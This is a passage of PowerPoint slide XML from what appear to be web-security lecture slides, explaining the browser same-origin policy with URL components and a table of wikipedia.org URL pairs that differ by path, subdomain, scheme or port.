              <a:t>http://coolsite.com:81</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/tools/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>info.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String matching:                                 same origins should match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>One origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not be able to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resources </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F52B6C-F8E2-8B46-9A93-D3E035996043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1371600" y="2133600"/>
            <a:ext cx="2057400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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FE298EE6-2BF0-A842-B436-A08D05084655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3771900" y="2133600"/>
            <a:ext cx="2057400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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2EDC05EA-BCEB-AF46-B187-73F38D0AD7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5638800" y="2133600"/>
            <a:ext cx="2057400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00B0F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6653820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898702-6A73-9E40-B68B-246B491F1702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00BCC1F0-E1AA-8F48-A995-1A6A0D9F0B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D1B08F7-566F-7D4A-923A-7F31EBA214D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3115448847"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="2255205"/>
          <a:ext cx="7467600" cy="4328157"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3733800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3733800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="659765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Originating</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-25" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>ocument</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="26034"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BBE0E3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Accessed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>ocument</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="26034"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BBE0E3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="659765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="26034"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E7F3F4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>b</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="26034"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E7F3F4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="659765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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3F9FA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>www.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>wikipedia.org/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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3F9FA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="659765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>://wikipedia.org/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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F3F4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>https</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>://wikipedia.org/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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F3F4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="659765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>81</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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3F9FA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>82</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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3F9FA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="659765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>81</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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F3F4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>http://wikipedia.org/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="2603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F3F4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5355F96-E154-B048-9EF9-0B0996620905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
